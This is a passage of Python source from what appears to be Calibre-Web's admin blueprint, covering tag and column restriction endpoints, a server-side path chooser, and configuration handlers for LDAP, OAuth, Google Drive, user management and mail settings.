json_dumps = json.dumps([{"domain": r.domain.replace('%', '*').replace('_', '?'), "id": r.id} for r in answer])
js = json.dumps(json_dumps.replace('"', "'")).lstrip('"').strip('"')
response = make_response(js.replace("'", '"'))
response.headers["Content-Type"] = "application/json; charset=utf-8"
return response
@admi.route("/ajax/editrestriction/<int:res_type>", defaults={"user_id": 0}, methods=['POST'])
@admi.route("/ajax/editrestriction/<int:res_type>/<int:user_id>", methods=['POST'])
@login_required
@admin_required
def edit_restriction(res_type, user_id):
element = request.form.to_dict()
if element['id'].startswith('a'):
if res_type == 0: # Tags as template
elementlist = config.list_allowed_tags()
elementlist[int(element['id'][1:])] = element['Element']
config.config_allowed_tags = ','.join(elementlist)
config.save()
if res_type == 1: # CustomC
elementlist = config.list_allowed_column_values()
elementlist[int(element['id'][1:])] = element['Element']
config.config_allowed_column_value = ','.join(elementlist)
config.save()
if res_type == 2: # Tags per user
if isinstance(user_id, int):
usr = ub.session.query(ub.User).filter(ub.User.id == int(user_id)).first()
else:
usr = current_user
elementlist = usr.list_allowed_tags()
elementlist[int(element['id'][1:])] = element['Element']
usr.allowed_tags = ','.join(elementlist)
ub.session_commit("Changed allowed tags of user {} to {}".format(usr.name, usr.allowed_tags))
if res_type == 3: # CColumn per user
if isinstance(user_id, int):
usr = ub.session.query(ub.User).filter(ub.User.id == int(user_id)).first()
else:
usr = current_user
elementlist = usr.list_allowed_column_values()
elementlist[int(element['id'][1:])] = element['Element']
usr.allowed_column_value = ','.join(elementlist)
ub.session_commit("Changed allowed columns of user {} to {}".format(usr.name, usr.allowed_column_value))
if element['id'].startswith('d'):
if res_type == 0: # Tags as template
elementlist = config.list_denied_tags()
elementlist[int(element['id'][1:])] = element['Element']
config.config_denied_tags = ','.join(elementlist)
config.save()
if res_type == 1: # CustomC
elementlist = config.list_denied_column_values()
elementlist[int(element['id'][1:])] = element['Element']
config.config_denied_column_value = ','.join(elementlist)
config.save()
if res_type == 2: # Tags per user
if isinstance(user_id, int):
usr = ub.session.query(ub.User).filter(ub.User.id == int(user_id)).first()
else:
usr = current_user
elementlist = usr.list_denied_tags()
elementlist[int(element['id'][1:])] = element['Element']
usr.denied_tags = ','.join(elementlist)
ub.session_commit("Changed denied tags of user {} to {}".format(usr.name, usr.denied_tags))
if res_type == 3: # CColumn per user
if isinstance(user_id, int):
usr = ub.session.query(ub.User).filter(ub.User.id == int(user_id)).first()
else:
usr = current_user
elementlist = usr.list_denied_column_values()
elementlist[int(element['id'][1:])] = element['Element']
usr.denied_column_value = ','.join(elementlist)
ub.session_commit("Changed denied columns of user {} to {}".format(usr.name, usr.denied_column_value))
return ""
def restriction_addition(element, list_func):
elementlist = list_func()
if elementlist == ['']:
elementlist = []
if not element['add_element'] in elementlist:
elementlist += [element['add_element']]
return ','.join(elementlist)
def restriction_deletion(element, list_func):
elementlist = list_func()
if element['Element'] in elementlist:
elementlist.remove(element['Element'])
return ','.join(elementlist)
def prepare_tags(user, action, tags_name, id_list):
if "tags" in tags_name:
tags = calibre_db.session.query(db.Tags).filter(db.Tags.id.in_(id_list)).all()
if not tags:
raise Exception(_("Tag not found"))
new_tags_list = [x.name for x in tags]
else:
tags = calibre_db.session.query(db.cc_classes[config.config_restricted_column])\
.filter(db.cc_classes[config.config_restricted_column].id.in_(id_list)).all()
new_tags_list = [x.value for x in tags]
saved_tags_list = user.__dict__[tags_name].split(",") if len(user.__dict__[tags_name]) else []
if action == "remove":
saved_tags_list = [x for x in saved_tags_list if x not in new_tags_list]
elif action == "add":
saved_tags_list.extend(x for x in new_tags_list if x not in saved_tags_list)
else:
raise Exception(_("Invalid Action"))
return ",".join(saved_tags_list)
@admi.route("/ajax/addrestriction/<int:res_type>", methods=['POST'])
@login_required
@admin_required
def add_user_0_restriction(res_type):
return add_restriction(res_type, 0)
@admi.route("/ajax/addrestriction/<int:res_type>/<int:user_id>", methods=['POST'])
@login_required
@admin_required
def add_restriction(res_type, user_id):
element = request.form.to_dict()
if res_type == 0: # Tags as template
if 'submit_allow' in element:
config.config_allowed_tags = restriction_addition(element, config.list_allowed_tags)
config.save()
elif 'submit_deny' in element:
config.config_denied_tags = restriction_addition(element, config.list_denied_tags)
config.save()
if res_type == 1: # CCustom as template
if 'submit_allow' in element:
config.config_allowed_column_value = restriction_addition(element, config.list_denied_column_values)
config.save()
elif 'submit_deny' in element:
config.config_denied_column_value = restriction_addition(element, config.list_allowed_column_values)
config.save()
if res_type == 2: # Tags per user
if isinstance(user_id, int):
usr = ub.session.query(ub.User).filter(ub.User.id == int(user_id)).first()
else:
usr = current_user
if 'submit_allow' in element:
usr.allowed_tags = restriction_addition(element, usr.list_allowed_tags)
ub.session_commit("Changed allowed tags of user {} to {}".format(usr.name, usr.list_allowed_tags()))
elif 'submit_deny' in element:
usr.denied_tags = restriction_addition(element, usr.list_denied_tags)
ub.session_commit("Changed denied tags of user {} to {}".format(usr.name, usr.list_denied_tags()))
if res_type == 3: # CustomC per user
if isinstance(user_id, int):
usr = ub.session.query(ub.User).filter(ub.User.id == int(user_id)).first()
else:
usr = current_user
if 'submit_allow' in element:
usr.allowed_column_value = restriction_addition(element, usr.list_allowed_column_values)
ub.session_commit("Changed allowed columns of user {} to {}".format(usr.name,
usr.list_allowed_column_values()))
elif 'submit_deny' in element:
usr.denied_column_value = restriction_addition(element, usr.list_denied_column_values)
ub.session_commit("Changed denied columns of user {} to {}".format(usr.name,
usr.list_denied_column_values()))
return ""
@admi.route("/ajax/deleterestriction/<int:res_type>", methods=['POST'])
@login_required
@admin_required
def delete_user_0_restriction(res_type):
return delete_restriction(res_type, 0)
@admi.route("/ajax/deleterestriction/<int:res_type>/<int:user_id>", methods=['POST'])
@login_required
@admin_required
def delete_restriction(res_type, user_id):
element = request.form.to_dict()
if res_type == 0: # Tags as template
if element['id'].startswith('a'):
config.config_allowed_tags = restriction_deletion(element, config.list_allowed_tags)
config.save()
elif element['id'].startswith('d'):
config.config_denied_tags = restriction_deletion(element, config.list_denied_tags)
config.save()
elif res_type == 1: # CustomC as template
if element['id'].startswith('a'):
config.config_allowed_column_value = restriction_deletion(element, config.list_allowed_column_values)
config.save()
elif element['id'].startswith('d'):
config.config_denied_column_value = restriction_deletion(element, config.list_denied_column_values)
config.save()
elif res_type == 2: # Tags per user
if isinstance(user_id, int):
usr = ub.session.query(ub.User).filter(ub.User.id == int(user_id)).first()
else:
usr = current_user
if element['id'].startswith('a'):
usr.allowed_tags = restriction_deletion(element, usr.list_allowed_tags)
ub.session_commit("Deleted allowed tags of user {}: {}".format(usr.name, usr.list_allowed_tags))
elif element['id'].startswith('d'):
usr.denied_tags = restriction_deletion(element, usr.list_denied_tags)
ub.session_commit("Deleted denied tags of user {}: {}".format(usr.name, usr.list_allowed_tags))
elif res_type == 3: # Columns per user
if isinstance(user_id, int):
usr = ub.session.query(ub.User).filter(ub.User.id == int(user_id)).first()
else:
usr = current_user
if element['id'].startswith('a'):
usr.allowed_column_value = restriction_deletion(element, usr.list_allowed_column_values)
ub.session_commit("Deleted allowed columns of user {}: {}".format(usr.name,
usr.list_allowed_column_values))
elif element['id'].startswith('d'):
usr.denied_column_value = restriction_deletion(element, usr.list_denied_column_values)
ub.session_commit("Deleted denied columns of user {}: {}".format(usr.name,
usr.list_denied_column_values))
return ""
@admi.route("/ajax/listrestriction/<int:res_type>", defaults={"user_id": 0})
@admi.route("/ajax/listrestriction/<int:res_type>/<int:user_id>")
@login_required
@admin_required
def list_restriction(res_type, user_id):
if res_type == 0: # Tags as template
restrict = [{'Element': x, 'type':_('Deny'), 'id': 'd'+str(i) }
for i,x in enumerate(config.list_denied_tags()) if x != '']
allow = [{'Element': x, 'type': _('Allow'), 'id': 'a'+str(i)}
for i, x in enumerate(config.list_allowed_tags()) if x != '']
json_dumps = restrict + allow
elif res_type == 1: # CustomC as template
restrict = [{'Element': x, 'type': _('Deny'), 'id': 'd'+str(i)}
for i, x in enumerate(config.list_denied_column_values()) if x != '']
allow = [{'Element': x, 'type': _('Allow'), 'id': 'a'+str(i)}
for i, x in enumerate(config.list_allowed_column_values()) if x != '']
json_dumps = restrict + allow
elif res_type == 2: # Tags per user
if isinstance(user_id, int):
usr = ub.session.query(ub.User).filter(ub.User.id == user_id).first()
else:
usr = current_user
restrict = [{'Element': x, 'type': _('Deny'), 'id': 'd'+str(i)}
for i, x in enumerate(usr.list_denied_tags()) if x != '']
allow = [{'Element': x, 'type': _('Allow'), 'id': 'a'+str(i)}
for i, x in enumerate(usr.list_allowed_tags()) if x != '']
json_dumps = restrict + allow
elif res_type == 3: # CustomC per user
if isinstance(user_id, int):
usr = ub.session.query(ub.User).filter(ub.User.id == user_id).first()
else:
usr = current_user
restrict = [{'Element': x, 'type': _('Deny'), 'id': 'd'+str(i)}
for i, x in enumerate(usr.list_denied_column_values()) if x != '']
allow = [{'Element': x, 'type': _('Allow'), 'id': 'a'+str(i)}
for i, x in enumerate(usr.list_allowed_column_values()) if x != '']
json_dumps = restrict + allow
else:
json_dumps = ""
js = json.dumps(json_dumps)
response = make_response(js)
response.headers["Content-Type"] = "application/json; charset=utf-8"
return response
@admi.route("/ajax/fullsync", methods=["POST"])
@login_required
def ajax_fullsync():
count = ub.session.query(ub.KoboSyncedBooks).filter(current_user.id == ub.KoboSyncedBooks.user_id).delete()
message = _("{} sync entries deleted").format(count)
ub.session_commit(message)
return Response(json.dumps([{"type": "success", "message": message}]), mimetype='application/json')
@admi.route("/ajax/pathchooser/")
@login_required
@admin_required
def ajax_pathchooser():
return pathchooser()
def pathchooser():
browse_for = "folder"
folder_only = request.args.get('folder', False) == "true"
file_filter = request.args.get('filter', "")
path = os.path.normpath(request.args.get('path', ""))
if os.path.isfile(path):
oldfile = path
path = os.path.dirname(path)
else:
oldfile = ""
absolute = False
if os.path.isdir(path):
# if os.path.isabs(path):
cwd = os.path.realpath(path)
absolute = True
# else:
# cwd = os.path.relpath(path)
else:
cwd = os.getcwd()
cwd = os.path.normpath(os.path.realpath(cwd))
parentdir = os.path.dirname(cwd)
if not absolute:
if os.path.realpath(cwd) == os.path.realpath("/"):
cwd = os.path.relpath(cwd)
else:
cwd = os.path.relpath(cwd) + os.path.sep
parentdir = os.path.relpath(parentdir) + os.path.sep
if os.path.realpath(cwd) == os.path.realpath("/"):
parentdir = ""
try:
folders = os.listdir(cwd)
except Exception:
folders = []
files = []
for f in folders:
try:
data = {"name": f, "fullpath": os.path.join(cwd, f)}
data["sort"] = data["fullpath"].lower()
except Exception:
continue
if os.path.isfile(os.path.join(cwd, f)):
if folder_only:
continue
if file_filter != "" and file_filter != f:
continue
data["type"] = "file"
data["size"] = os.path.getsize(os.path.join(cwd, f))
power = 0
while (data["size"] >> 10) > 0.3:
power += 1
data["size"] >>= 10
units = ("", "K", "M", "G", "T")
data["size"] = str(data["size"]) + " " + units[power] + "Byte"
else:
data["type"] = "dir"
data["size"] = ""
files.append(data)
files = sorted(files, key=operator.itemgetter("type", "sort"))
context = {
"cwd": cwd,
"files": files,
"parentdir": parentdir,
"type": browse_for,
"oldfile": oldfile,
"absolute": absolute,
}
return json.dumps(context)
def _config_int(to_save, x, func=int):
return config.set_from_dictionary(to_save, x, func)
def _config_checkbox(to_save, x):
return config.set_from_dictionary(to_save, x, lambda y: y == "on", False)
def _config_checkbox_int(to_save, x):
return config.set_from_dictionary(to_save, x, lambda y: 1 if (y == "on") else 0, 0)
def _config_string(to_save, x):
return config.set_from_dictionary(to_save, x, lambda y: y.strip() if y else y)
def _configuration_gdrive_helper(to_save):
gdrive_error = None
if to_save.get("config_use_google_drive"):
gdrive_secrets = {}
if not os.path.isfile(gdriveutils.SETTINGS_YAML):
config.config_use_google_drive = False
if gdrive_support:
gdrive_error = gdriveutils.get_error_text(gdrive_secrets)
if "config_use_google_drive" in to_save and not config.config_use_google_drive and not gdrive_error:
with open(gdriveutils.CLIENT_SECRETS, 'r') as settings:
gdrive_secrets = json.load(settings)['web']
if not gdrive_secrets:
return _configuration_result(_('client_secrets.json Is Not Configured For Web Application'))
gdriveutils.update_settings(
gdrive_secrets['client_id'],
gdrive_secrets['client_secret'],
gdrive_secrets['redirect_uris'][0]
)
# always show google drive settings, but in case of error deny support
new_gdrive_value = (not gdrive_error) and ("config_use_google_drive" in to_save)
if config.config_use_google_drive and not new_gdrive_value:
config.config_google_drive_watch_changes_response = {}
config.config_use_google_drive = new_gdrive_value
if _config_string(to_save, "config_google_drive_folder"):
gdriveutils.deleteDatabaseOnChange()
return gdrive_error
def _configuration_oauth_helper(to_save):
active_oauths = 0
reboot_required = False
for element in oauthblueprints:
if to_save["config_" + str(element['id']) + "_oauth_client_id"] != element['oauth_client_id'] \
or to_save["config_" + str(element['id']) + "_oauth_client_secret"] != element['oauth_client_secret']:
reboot_required = True
element['oauth_client_id'] = to_save["config_" + str(element['id']) + "_oauth_client_id"]
element['oauth_client_secret'] = to_save["config_" + str(element['id']) + "_oauth_client_secret"]
if to_save["config_" + str(element['id']) + "_oauth_client_id"] \
and to_save["config_" + str(element['id']) + "_oauth_client_secret"]:
active_oauths += 1
element["active"] = 1
else:
element["active"] = 0
ub.session.query(ub.OAuthProvider).filter(ub.OAuthProvider.id == element['id']).update(
{"oauth_client_id": to_save["config_" + str(element['id']) + "_oauth_client_id"],
"oauth_client_secret": to_save["config_" + str(element['id']) + "_oauth_client_secret"],
"active": element["active"]})
return reboot_required
def _configuration_logfile_helper(to_save):
reboot_required = False
reboot_required |= _config_int(to_save, "config_log_level")
reboot_required |= _config_string(to_save, "config_logfile")
if not logger.is_valid_logfile(config.config_logfile):
return reboot_required, \
_configuration_result(_('Logfile Location is not Valid, Please Enter Correct Path'))
reboot_required |= _config_checkbox_int(to_save, "config_access_log")
reboot_required |= _config_string(to_save, "config_access_logfile")
if not logger.is_valid_logfile(config.config_access_logfile):
return reboot_required, \
_configuration_result(_('Access Logfile Location is not Valid, Please Enter Correct Path'))
return reboot_required, None
def _configuration_ldap_helper(to_save):
reboot_required = False
reboot_required |= _config_string(to_save, "config_ldap_provider_url")
reboot_required |= _config_int(to_save, "config_ldap_port")
reboot_required |= _config_int(to_save, "config_ldap_authentication")
reboot_required |= _config_string(to_save, "config_ldap_dn")
reboot_required |= _config_string(to_save, "config_ldap_serv_username")
reboot_required |= _config_string(to_save, "config_ldap_user_object")
reboot_required |= _config_string(to_save, "config_ldap_group_object_filter")
reboot_required |= _config_string(to_save, "config_ldap_group_members_field")
reboot_required |= _config_string(to_save, "config_ldap_member_user_object")
reboot_required |= _config_checkbox(to_save, "config_ldap_openldap")
reboot_required |= _config_int(to_save, "config_ldap_encryption")
reboot_required |= _config_string(to_save, "config_ldap_cacert_path")
reboot_required |= _config_string(to_save, "config_ldap_cert_path")
reboot_required |= _config_string(to_save, "config_ldap_key_path")
_config_string(to_save, "config_ldap_group_name")
if to_save.get("config_ldap_serv_password", "") != "":
reboot_required |= 1
config.set_from_dictionary(to_save, "config_ldap_serv_password", base64.b64encode, encode='UTF-8')
config.save()
if not config.config_ldap_provider_url \
or not config.config_ldap_port \
or not config.config_ldap_dn \
or not config.config_ldap_user_object:
return reboot_required, _configuration_result(_('Please Enter a LDAP Provider, '
'Port, DN and User Object Identifier'))
if config.config_ldap_authentication > constants.LDAP_AUTH_ANONYMOUS:
if config.config_ldap_authentication > constants.LDAP_AUTH_UNAUTHENTICATE:
if not config.config_ldap_serv_username or not bool(config.config_ldap_serv_password):
return reboot_required, _configuration_result(_('Please Enter a LDAP Service Account and Password'))
else:
if not config.config_ldap_serv_username:
return reboot_required, _configuration_result(_('Please Enter a LDAP Service Account'))
if config.config_ldap_group_object_filter:
if config.config_ldap_group_object_filter.count("%s") != 1:
return reboot_required, \
_configuration_result(_('LDAP Group Object Filter Needs to Have One "%s" Format Identifier'))
if config.config_ldap_group_object_filter.count("(") != config.config_ldap_group_object_filter.count(")"):
return reboot_required, _configuration_result(_('LDAP Group Object Filter Has Unmatched Parenthesis'))
if config.config_ldap_user_object.count("%s") != 1:
return reboot_required, \
_configuration_result(_('LDAP User Object Filter needs to Have One "%s" Format Identifier'))
if config.config_ldap_user_object.count("(") != config.config_ldap_user_object.count(")"):
return reboot_required, _configuration_result(_('LDAP User Object Filter Has Unmatched Parenthesis'))
if to_save.get("ldap_import_user_filter") == '0':
config.config_ldap_member_user_object = ""
else:
if config.config_ldap_member_user_object.count("%s") != 1:
return reboot_required, \
_configuration_result(_('LDAP Member User Filter needs to Have One "%s" Format Identifier'))
if config.config_ldap_member_user_object.count("(") != config.config_ldap_member_user_object.count(")"):
return reboot_required, _configuration_result(_('LDAP Member User Filter Has Unmatched Parenthesis'))
if config.config_ldap_cacert_path or config.config_ldap_cert_path or config.config_ldap_key_path:
if not (os.path.isfile(config.config_ldap_cacert_path) and
os.path.isfile(config.config_ldap_cert_path) and
os.path.isfile(config.config_ldap_key_path)):
return reboot_required, \
_configuration_result(_('LDAP CACertificate, Certificate or Key Location is not Valid, '
'Please Enter Correct Path'))
return reboot_required, None
@admi.route("/ajax/simulatedbchange", methods=['POST'])
@login_required
@admin_required
def simulatedbchange():
db_change, db_valid = _db_simulate_change()
return Response(json.dumps({"change": db_change, "valid": db_valid}), mimetype='application/json')
def _db_simulate_change():
param = request.form.to_dict()
to_save = {}
to_save['config_calibre_dir'] = re.sub(r'[\\/]metadata\.db$',
'',
param['config_calibre_dir'],
flags=re.IGNORECASE).strip()
db_change = config.config_calibre_dir != to_save["config_calibre_dir"] and config.config_calibre_dir
db_valid = calibre_db.check_valid_db(to_save["config_calibre_dir"], ub.app_DB_path)
return db_change, db_valid
def _db_configuration_update_helper():
db_change = False
to_save = request.form.to_dict()
gdrive_error = None
to_save['config_calibre_dir'] = re.sub(r'[\\/]metadata\.db$',
'',
to_save['config_calibre_dir'],
flags=re.IGNORECASE)
try:
db_change, db_valid = _db_simulate_change()
# gdrive_error drive setup
gdrive_error = _configuration_gdrive_helper(to_save)
except (OperationalError, InvalidRequestError):
ub.session.rollback()
log.error("Settings DB is not Writeable")
_db_configuration_result(_("Settings DB is not Writeable"), gdrive_error)
try:
metadata_db = os.path.join(to_save['config_calibre_dir'], "metadata.db")
if config.config_use_google_drive and is_gdrive_ready() and not os.path.exists(metadata_db):
gdriveutils.downloadFile(None, "metadata.db", metadata_db)
db_change = True
except Exception as ex:
return _db_configuration_result('{}'.format(ex), gdrive_error)
if db_change or not db_valid or not config.db_configured:
if not calibre_db.setup_db(to_save['config_calibre_dir'], ub.app_DB_path):
return _db_configuration_result(_('DB Location is not Valid, Please Enter Correct Path'),
gdrive_error)
# if db changed -> delete shelfs, delete download books, delete read books, kobo sync...
ub.session.query(ub.Downloads).delete()
ub.session.query(ub.ArchivedBook).delete()
ub.session.query(ub.ReadBook).delete()
ub.session.query(ub.BookShelf).delete()
ub.session.query(ub.Bookmark).delete()
ub.session.query(ub.KoboReadingState).delete()
ub.session.query(ub.KoboStatistics).delete()
ub.session.query(ub.KoboSyncedBooks).delete()
ub.session_commit()
_config_string(to_save, "config_calibre_dir")
calibre_db.update_config(config)
if not os.access(os.path.join(config.config_calibre_dir, "metadata.db"), os.W_OK):
flash(_(u"DB is not Writeable"), category="warning")
config.save()
return _db_configuration_result(None, gdrive_error)
def _configuration_update_helper():
reboot_required = False
to_save = request.form.to_dict()
try:
reboot_required |= _config_int(to_save, "config_port")
reboot_required |= _config_string(to_save, "config_trustedhosts")
reboot_required |= _config_string(to_save, "config_keyfile")
if config.config_keyfile and not os.path.isfile(config.config_keyfile):
return _configuration_result(_('Keyfile Location is not Valid, Please Enter Correct Path'))
reboot_required |= _config_string(to_save, "config_certfile")
if config.config_certfile and not os.path.isfile(config.config_certfile):
return _configuration_result(_('Certfile Location is not Valid, Please Enter Correct Path'))
_config_checkbox_int(to_save, "config_uploading")
_config_checkbox_int(to_save, "config_unicode_filename")
# Reboot on config_anonbrowse with enabled ldap, as decoraters are changed in this case
reboot_required |= (_config_checkbox_int(to_save, "config_anonbrowse")
and config.config_login_type == constants.LOGIN_LDAP)
_config_checkbox_int(to_save, "config_public_reg")
_config_checkbox_int(to_save, "config_register_email")
reboot_required |= _config_checkbox_int(to_save, "config_kobo_sync")
_config_int(to_save, "config_external_port")
_config_checkbox_int(to_save, "config_kobo_proxy")
if "config_upload_formats" in to_save:
to_save["config_upload_formats"] = ','.join(
helper.uniq([x.lstrip().rstrip().lower() for x in to_save["config_upload_formats"].split(',')]))
_config_string(to_save, "config_upload_formats")
constants.EXTENSIONS_UPLOAD = config.config_upload_formats.split(',')
_config_string(to_save, "config_calibre")
_config_string(to_save, "config_converterpath")
_config_string(to_save, "config_kepubifypath")
reboot_required |= _config_int(to_save, "config_login_type")
# LDAP configurator
if config.config_login_type == constants.LOGIN_LDAP:
reboot, message = _configuration_ldap_helper(to_save)
if message:
return message
reboot_required |= reboot
# Remote login configuration
_config_checkbox(to_save, "config_remote_login")
if not config.config_remote_login:
ub.session.query(ub.RemoteAuthToken).filter(ub.RemoteAuthToken.token_type == 0).delete()
# Goodreads configuration
_config_checkbox(to_save, "config_use_goodreads")
_config_string(to_save, "config_goodreads_api_key")
_config_string(to_save, "config_goodreads_api_secret")
if services.goodreads_support:
services.goodreads_support.connect(config.config_goodreads_api_key,
config.config_goodreads_api_secret,
config.config_use_goodreads)
_config_int(to_save, "config_updatechannel")
# Reverse proxy login configuration
_config_checkbox(to_save, "config_allow_reverse_proxy_header_login")
_config_string(to_save, "config_reverse_proxy_login_header_name")
# OAuth configuration
if config.config_login_type == constants.LOGIN_OAUTH:
reboot_required |= _configuration_oauth_helper(to_save)
reboot, message = _configuration_logfile_helper(to_save)
if message:
return message
reboot_required |= reboot
# Rarfile Content configuration
_config_string(to_save, "config_rarfile_location")
if "config_rarfile_location" in to_save:
unrar_status = helper.check_unrar(config.config_rarfile_location)
if unrar_status:
return _configuration_result(unrar_status)
except (OperationalError, InvalidRequestError):
ub.session.rollback()
log.error("Settings DB is not Writeable")
_configuration_result(_("Settings DB is not Writeable"))
config.save()
if reboot_required:
web_server.stop(True)
return _configuration_result(None, reboot_required)
def _configuration_result(error_flash=None, reboot=False):
resp = {}
if error_flash:
log.error(error_flash)
config.load()
resp['result'] = [{'type': "danger", 'message': error_flash}]
else:
resp['result'] = [{'type': "success", 'message':_(u"Calibre-Web configuration updated")}]
resp['reboot'] = reboot
resp['config_upload']= config.config_upload_formats
return Response(json.dumps(resp), mimetype='application/json')
def _db_configuration_result(error_flash=None, gdrive_error=None):
gdrive_authenticate = not is_gdrive_ready()
gdrivefolders = []
if not gdrive_error and config.config_use_google_drive:
gdrive_error = gdriveutils.get_error_text()
if gdrive_error and gdrive_support:
log.error(gdrive_error)
gdrive_error = _(gdrive_error)
flash(gdrive_error, category="error")
else:
if not gdrive_authenticate and gdrive_support:
gdrivefolders = gdriveutils.listRootFolders()
if error_flash:
log.error(error_flash)
config.load()
flash(error_flash, category="error")
elif request.method == "POST" and not gdrive_error:
flash(_("Database Settings updated"), category="success")
return render_title_template("config_db.html",
config=config,
show_authenticate_google_drive=gdrive_authenticate,
gdriveError=gdrive_error,
gdrivefolders=gdrivefolders,
feature_support=feature_support,
title=_(u"Database Configuration"), page="dbconfig")
def _handle_new_user(to_save, content, languages, translations, kobo_support):
content.default_language = to_save["default_language"]
content.locale = to_save.get("locale", content.locale)
content.sidebar_view = sum(int(key[5:]) for key in to_save if key.startswith('show_'))
if "show_detail_random" in to_save:
content.sidebar_view |= constants.DETAIL_RANDOM
content.role = constants.selected_roles(to_save)
content.password = generate_password_hash(to_save["password"])
try:
if not to_save["name"] or not to_save["email"] or not to_save["password"]:
log.info("Missing entries on new user")
raise Exception(_(u"Please fill out all fields!"))
content.email = check_email(to_save["email"])
# Query User name, if not existing, change
content.name = check_username(to_save["name"])
if to_save.get("kindle_mail"):
content.kindle_mail = valid_email(to_save["kindle_mail"])
if config.config_public_reg and not check_valid_domain(content.email):
log.info("E-mail: {} for new user is not from valid domain".format(content.email))
raise Exception(_(u"E-mail is not from valid domain"))
except Exception as ex:
flash(str(ex), category="error")
return render_title_template("user_edit.html", new_user=1, content=content,
config=config,
translations=translations,
languages=languages, title=_(u"Add new user"), page="newuser",
kobo_support=kobo_support, registered_oauth=oauth_check)
try:
content.allowed_tags = config.config_allowed_tags
content.denied_tags = config.config_denied_tags
content.allowed_column_value = config.config_allowed_column_value
content.denied_column_value = config.config_denied_column_value
# No default value for kobo sync shelf setting
content.kobo_only_shelves_sync = to_save.get("kobo_only_shelves_sync", 0) == "on"
ub.session.add(content)
ub.session.commit()
flash(_(u"User '%(user)s' created", user=content.name), category="success")
log.debug("User {} created".format(content.name))
return redirect(url_for('admin.admin'))
except IntegrityError:
ub.session.rollback()
log.error("Found an existing account for {} or {}".format(content.name, content.email))
flash(_("Found an existing account for this e-mail address or name."), category="error")
except OperationalError:
ub.session.rollback()
log.error("Settings DB is not Writeable")
flash(_("Settings DB is not Writeable"), category="error")
def _delete_user(content):
if ub.session.query(ub.User).filter(ub.User.role.op('&')(constants.ROLE_ADMIN) == constants.ROLE_ADMIN,
ub.User.id != content.id).count():
if content.name != "Guest":
# Delete all books in shelfs belonging to user, all shelfs of user, downloadstat of user, read status
# and user itself
ub.session.query(ub.ReadBook).filter(content.id == ub.ReadBook.user_id).delete()
ub.session.query(ub.Downloads).filter(content.id == ub.Downloads.user_id).delete()
for us in ub.session.query(ub.Shelf).filter(content.id == ub.Shelf.user_id):
ub.session.query(ub.BookShelf).filter(us.id == ub.BookShelf.shelf).delete()
ub.session.query(ub.Shelf).filter(content.id == ub.Shelf.user_id).delete()
ub.session.query(ub.User).filter(ub.User.id == content.id).delete()
ub.session_commit()
log.info(u"User {} deleted".format(content.name))
return(_(u"User '%(nick)s' deleted", nick=content.name))
else:
log.warning(_(u"Can't delete Guest User"))
raise Exception(_(u"Can't delete Guest User"))
else:
log.warning(u"No admin user remaining, can't delete user")
raise Exception(_(u"No admin user remaining, can't delete user"))
def _handle_edit_user(to_save, content, languages, translations, kobo_support):
if to_save.get("delete"):
try:
flash(_delete_user(content), category="success")
except Exception as ex:
log.error(ex)
flash(str(ex), category="error")
return redirect(url_for('admin.admin'))
else:
if not ub.session.query(ub.User).filter(ub.User.role.op('&')(constants.ROLE_ADMIN) == constants.ROLE_ADMIN,
ub.User.id != content.id).count() and 'admin_role' not in to_save:
log.warning("No admin user remaining, can't remove admin role from {}".format(content.name))
flash(_("No admin user remaining, can't remove admin role"), category="error")
return redirect(url_for('admin.admin'))
if to_save.get("password"):
content.password = generate_password_hash(to_save["password"])
anonymous = content.is_anonymous
content.role = constants.selected_roles(to_save)
if anonymous:
content.role |= constants.ROLE_ANONYMOUS
else:
content.role &= ~constants.ROLE_ANONYMOUS
val = [int(k[5:]) for k in to_save if k.startswith('show_')]
sidebar = get_sidebar_config()
for element in sidebar:
value = element['visibility']
if value in val and not content.check_visibility(value):
content.sidebar_view |= value
elif value not in val and content.check_visibility(value):
content.sidebar_view &= ~value
if to_save.get("Show_detail_random"):
content.sidebar_view |= constants.DETAIL_RANDOM
else:
content.sidebar_view &= ~constants.DETAIL_RANDOM
old_state = content.kobo_only_shelves_sync
content.kobo_only_shelves_sync = int(to_save.get("kobo_only_shelves_sync") == "on") or 0
# 1 -> 0: nothing has to be done
# 0 -> 1: all synced books have to be added to archived books, + currently synced shelfs
# which don't have to be synced have to be removed (added to Shelf archive)
if old_state == 0 and content.kobo_only_shelves_sync == 1:
kobo_sync_status.update_on_sync_shelfs(content.id)
if to_save.get("default_language"):
content.default_language = to_save["default_language"]
if to_save.get("locale"):
content.locale = to_save["locale"]
try:
if to_save.get("email", content.email) != content.email:
content.email = check_email(to_save["email"])
# Query User name, if not existing, change
if to_save.get("name", content.name) != content.name:
if to_save.get("name") == "Guest":
raise Exception(_("Guest Name can't be changed"))
content.name = check_username(to_save["name"])
if to_save.get("kindle_mail") != content.kindle_mail:
content.kindle_mail = valid_email(to_save["kindle_mail"]) if to_save["kindle_mail"] else ""
except Exception as ex:
log.error(ex)
flash(str(ex), category="error")
return render_title_template("user_edit.html",
translations=translations,
languages=languages,
mail_configured=config.get_mail_server_configured(),
kobo_support=kobo_support,
new_user=0,
content=content,
config=config,
registered_oauth=oauth_check,
title=_(u"Edit User %(nick)s", nick=content.name),
page="edituser")
try:
ub.session_commit()
flash(_(u"User '%(nick)s' updated", nick=content.name), category="success")
except IntegrityError as ex:
ub.session.rollback()
log.error("An unknown error occurred while changing user: {}".format(str(ex)))
flash(_(u"An unknown error occurred. Please try again later."), category="error")
except OperationalError:
ub.session.rollback()
log.error("Settings DB is not Writeable")
flash(_("Settings DB is not Writeable"), category="error")
return ""
@admi.route("/admin/user/new", methods=["GET", "POST"])
@login_required
@admin_required
def new_user():
content = ub.User()
languages = calibre_db.speaking_language()
translations = [LC('en')] + babel.list_translations()
kobo_support = feature_support['kobo'] and config.config_kobo_sync
if request.method == "POST":
to_save = request.form.to_dict()
_handle_new_user(to_save, content, languages, translations, kobo_support)
else:
content.role = config.config_default_role
content.sidebar_view = config.config_default_show
content.locale = config.config_default_locale
content.default_language = config.config_default_language
return render_title_template("user_edit.html", new_user=1, content=content,
config=config, translations=translations,
languages=languages, title=_(u"Add new user"), page="newuser",
kobo_support=kobo_support, registered_oauth=oauth_check)
@admi.route("/admin/mailsettings")
@login_required
@admin_required
def edit_mailsettings():
content = config.get_mail_settings()
return render_title_template("email_edit.html", content=content, title=_(u"Edit E-mail Server Settings"),
page="mailset", feature_support=feature_support)
@admi.route("/admin/mailsettings", methods=["POST"])
@login_required
@admin_required
def update_mailsettings():
to_save = request.form.to_dict()
_config_int(to_save, "mail_server_type")
if to_save.get("invalidate"):
config.mail_gmail_token = {}
try:
flag_modified(config, "mail_gmail_token")
except AttributeError:
pass
